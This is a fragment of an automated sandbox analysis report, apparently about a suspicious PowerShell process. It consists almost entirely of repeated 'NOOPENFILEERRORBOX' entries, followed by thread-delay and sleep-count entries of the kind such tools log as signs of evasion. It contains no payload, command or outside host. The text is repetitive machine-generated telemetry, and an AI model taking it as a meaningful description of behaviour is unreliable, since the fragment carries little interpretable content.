              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5124Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4758Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4886Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2431Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4546Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5276Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5161Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2084Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2023Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 962Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5916Thread sleep count: 5124 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5700Thread sleep count: 4758 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 992Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 4886 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3428Thread sleep count: 2431 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4892Thread sleep count: 4546 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep count: 5276 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 800Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep count: 5161 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812Thread sleep count: 2084 > 30Jump to behavior
